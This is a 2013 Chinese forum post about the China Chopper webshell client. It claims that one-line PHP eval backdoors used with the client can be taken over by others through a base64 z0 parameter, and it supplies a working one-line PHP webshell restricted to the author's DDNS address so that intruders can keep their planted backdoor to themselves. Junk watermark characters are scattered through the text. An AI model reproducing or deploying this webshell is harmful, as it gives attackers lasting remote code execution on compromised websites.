标题: 中国菜刀 maicaidao 网站管理软件 0day [打印本页] 作者: admin 时间: 2013-7-26 12:45 标题: 中国菜刀 maicaidao 网站管理软件 0day 今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞# n0 ?7 I' o* x' h
$ n8 ~, r) J( b0 K/ z! l6 S
就算你设置了密码,使用了eval($_REQUEST['moyo']); 8 A& P4 p# g9 ~) H0 m. Q9 P % y% w5 q- `1 e- x* S; A3 R但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门+ G6 E3 d/ |$ X. q
( Y$ O7 I+ o$ j }1 e5 c- J
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0])); 1 y5 s( _1 i% {, E9 W) l ) A% y [) E T7 V9 _3 u直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了 ! g' f0 G1 g- R |9 O' X; W+ V " _2 z, o/ m( {3 S- h% u不知道是设计缺陷还是故意留的后门7 F- u6 y9 t( i, n2 k+ O4 F
3 S. O, t0 r4 M7 P+ {如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用, D3 W4 F' [2 |: U5 P% A ^" n
: _: o. c' F- y
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org! n: ~9 Z9 x$ _ d* g' y
/ t2 ~ q, u1 m3 @1 R/ ^+ I然后一句话后门这样写1 @/ J. C6 z5 ]5 o
* Z' w1 r5 \" d6 J& k<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>% f4 a! R3 w* | `* Q g! i- A
这样就可以让一句话后门只允许自己的电脑连接了 + d. _) w! U# e% Q; i7 a) D : a# A' |! W# D